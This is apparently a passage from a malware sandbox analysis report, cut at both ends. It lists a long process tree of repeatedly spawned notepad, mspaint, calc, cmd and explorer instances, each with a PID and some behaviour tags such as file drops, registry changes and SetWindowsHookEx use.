      4⤵
      PID:2968
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:1016
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4752
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1356
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:4408
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:4612
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4508
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:2828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:4064
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:4720
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5136
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:5176
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:5212
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5280
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:5340
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5396
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5444
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:5492
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:5592
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:5652
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5672
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:5716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5788
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5848
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:5900
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5928
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:5972
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:6024
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:6052
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6092
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6132
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:1476
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:3136
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:400
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:5648
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:5112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5528
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5740
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:2880
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5932
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:5928
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4844
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6164
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6216
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6272
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:6320
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:6360
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:6388
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6464
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6556
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6604
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6644
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6720
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:6784
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6880
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6936
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:6980
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7064
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:7128
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:532
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:5240
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:5192
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:6016
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:6024
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6544
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2028
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      PID:5044
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6652
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:5864
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:5472
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5696
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:2960
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:4372
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:5936
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:6164
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5228
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:6160
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6468
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7124
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6508
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6272
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6880
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5712
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6956
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:7176
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7196
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7224
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7268
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7328
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:7388
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7460
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7508
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7536
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7584
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7628
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7656
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7700
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7744
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7824
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:7876
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7940
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8004
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8100
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8140
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8184
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6456
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:6336
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7240
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7148
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7216
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6588
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:6832
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6340
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:3840
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7528
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6048
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:2368
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:3572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6668
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:3760
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:3728
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7488
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7856
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:7772
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7880
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7424
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:5080
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7780
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7844
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8248
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8332
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8404
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8516
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8644
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8692
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8720
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8788
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8836
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8872
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8928
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8964
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9004
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9048
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9124
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9204
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2776
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8480
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7552
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7892
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8024
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8688
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:6444
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8264
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8564
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9068
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8916
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:7560
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7424
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5080
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9036
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8288
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:5368
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8312
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8524
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:6904
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8812
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:1676
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2772
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:2612
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2192
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:7844
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8216
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8348
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7372
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9188
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:8076
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:5860
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9260
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9392
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9424
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9484
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9528
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9552
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9620
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9728
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9772
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9840
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9884
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9948
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10020
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10060
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10124
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10204
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8220
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:4160
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:968
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9352
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:1348
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9516
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9420
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:5016
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9348
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:4288
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:212
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10124
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:8832
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2688
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9056
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9508
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9376
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:9980
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:8204
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:4860
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9720
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:4640
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9844
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9840
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:8664
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9904
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9852
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9400
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10052
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:3164
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9268
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10216
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:9184
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8056
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:3568
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:4852
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:9384
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9748
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10260
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10316
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:10436
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10528
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10584
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10660
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:10692
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10732
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10792
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10892
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10936
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10964
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:11048
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:11092
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:11200
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:11228
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:408
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:2688
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:5568
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9592
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:8288
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10244
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10660
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:4700
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:372
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:9496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5124
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5252
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10464
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10772
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:10260
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:5984
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:4012
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:4984
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:6104
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:5952
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10492
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:10480
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10756
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      PID:10536
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:6516
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      PID:11060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:9236
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:11200
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:10256
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:7160
  - - C:\Windows\System32\notepad.exe
